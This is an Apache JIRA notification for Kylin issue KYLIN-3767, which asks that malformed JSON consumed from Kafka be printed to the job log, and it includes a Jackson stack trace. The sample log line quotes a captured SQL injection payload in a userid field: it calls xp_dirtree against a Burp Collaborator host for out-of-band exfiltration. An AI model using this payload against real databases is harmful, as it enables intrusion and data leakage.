[ https://issues.apache.org/jira/browse/KYLIN-3767?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16740450#comment-16740450 ]
ASF GitHub Bot commented on KYLIN-3767: --------------------------------------- shaofengshi commented on pull request #428: KYLIN-3767 Print the malformed JSON data consumed from Kafka Topic URL: https://github.com/apache/kylin/pull/428 ---------------------------------------------------------------- This is an automated message from the Apache Git Service. To respond to the message, please log on GitHub and use the URL above to go to the specific comment. For queries about this service, please contact Infrastructure at: us...@infra.apache.org > Print the malformed JSON data consumed from Kafka Topic > ------------------------------------------------------- > > Key: KYLIN-3767 > URL: https://issues.apache.org/jira/browse/KYLIN-3767 > Project: Kylin > Issue Type: Improvement > Components: Job Engine > Affects Versions: v2.2.0, v2.3.0, v2.4.0 > Reporter: Temple Zhou > Assignee: Temple Zhou > Priority: Major > Attachments: KYLIN-3767.master.001.patch > > > Recently, I found that my cube with streaming data built failed, so I checked > the syslog in the failed MR job. > But the log contents didn't help, which is as follows: > {code:java} > 2019-01-11 15:12:48,774 INFO [main] > org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader: > kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1537268 > 2019-01-11 15:12:48,776 INFO [main] > org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader: > kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1537768 > 2019-01-11 15:12:48,778 INFO [main] > org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader: > kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1538268 > 2019-01-11 15:12:48,781 INFO [main] > org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader: > kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1538768 > 2019-01-11 15:12:48,783 INFO [main] > org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader: > kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1539268 > 2019-01-11 15:12:48,787 ERROR [main] > org.apache.kylin.source.kafka.TimedJsonStreamParser: error > org.apache.kylin.job.shaded.com.fasterxml.jackson.core.JsonParseException: > Unrecognized character escape 'h' (code 104) > at [Source: (org.apache.kylin.common.util.ByteBufferBackedInputStream); > line: 1, column: 207] > at > org.apache.kylin.job.shaded.com.fasterxml.jackson.core.JsonParser._constructError(JsonParser.java:1804) > at > org.apache.kylin.job.shaded.com.fasterxml.jackson.core.base.ParserMinimalBase._reportError(ParserMinimalBase.java:663) > at > org.apache.kylin.job.shaded.com.fasterxml.jackson.core.base.ParserMinimalBase._handleUnrecognizedCharacterEscape(ParserMinimalBase.java:640) > at > org.apache.kylin.job.shaded.com.fasterxml.jackson.core.json.UTF8StreamJsonParser._decodeEscaped(UTF8StreamJsonParser.java:3243) > at > org.apache.kylin.job.shaded.com.fasterxml.jackson.core.json.UTF8StreamJsonParser._finishString2(UTF8StreamJsonParser.java:2452) > at > org.apache.kylin.job.shaded.com.fasterxml.jackson.core.json.UTF8StreamJsonParser._finishAndReturnString(UTF8StreamJsonParser.java:2407) > at > org.apache.kylin.job.shaded.com.fasterxml.jackson.core.json.UTF8StreamJsonParser.getText(UTF8StreamJsonParser.java:269) > at > org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer$Vanilla.deserialize(UntypedObjectDeserializer.java:672) > at > org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.deser.std.MapDeserializer._readAndBindStringKeyMap(MapDeserializer.java:527) > at > org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.deser.std.MapDeserializer.deserialize(MapDeserializer.java:364) > at > org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.deser.std.MapDeserializer.deserialize(MapDeserializer.java:29) > at > org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.ObjectMapper._readMapAndClose(ObjectMapper.java:4001) > at > org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.ObjectMapper.readValue(ObjectMapper.java:3072) > at > org.apache.kylin.source.kafka.TimedJsonStreamParser.parse(TimedJsonStreamParser.java:112) > at > org.apache.kylin.source.kafka.hadoop.KafkaFlatTableMapper.doMap(KafkaFlatTableMapper.java:87) > at > org.apache.kylin.source.kafka.hadoop.KafkaFlatTableMapper.doMap(KafkaFlatTableMapper.java:48) > at org.apache.kylin.engine.mr.KylinMapper.map(KylinMapper.java:77) > at org.apache.hadoop.mapreduce.Mapper.run(Mapper.java:145) > at org.apache.hadoop.mapred.MapTask.runNewMapper(MapTask.java:793) > at org.apache.hadoop.mapred.MapTask.run(MapTask.java:341) > at org.apache.hadoop.mapred.YarnChild$2.run(YarnChild.java:164) > at java.security.AccessController.doPrivileged(Native Method) > at javax.security.auth.Subject.doAs(Subject.java:422) > at > org.apache.hadoop.security.UserGroupInformation.doAs(UserGroupInformation.java:1917) > at org.apache.hadoop.mapred.YarnChild.main(YarnChild.java:158) > {code} > Maybe, the malformed json data should be printed in the syslog, which can > help me to troubleshooting. > Just like that: > {code:java} > ... > 2019-01-11 15:12:48,778 INFO [main] > org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader: > kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1538268 > 2019-01-11 15:12:48,781 INFO [main] > org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader: > kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1538768 > 2019-01-11 15:12:48,783 INFO [main] > org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader: > kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1539268 > 2019-01-11 15:12:48,785 ERROR [main] > org.apache.kylin.source.kafka.TimedJsonStreamParser: malformed data: > {"site":"10010-2","channel":"3","atime":1547119709319,"userid":"909c1c003ee825fc57c9d1fb20f279091547119221751;declare > @q varchar(99);set > @q='\\9jtdffd7wspm21e6llv88xu6pxvrji960tyhn.burpcollab'+'orator.net\hsh'; > exec master.dbo.xp_dirtree @q;-- "} > 2019-01-11 15:12:48,787 ERROR [main] > org.apache.kylin.source.kafka.TimedJsonStreamParser: error > org.apache.kylin.job.shaded.com.fasterxml.jackson.core.JsonParseException: > Unrecognized character escape 'h' (code 104) > at [Source: (org.apache.kylin.common.util.ByteBufferBackedInputStream); > line: 1, column: 207] > at > org.apache.kylin.job.shaded.com.fasterxml.jackson.core.JsonParser._constructError(JsonParser.java:1804) > ... > {code} -- This message was sent by Atlassian JIRA (v7.6.3#76005)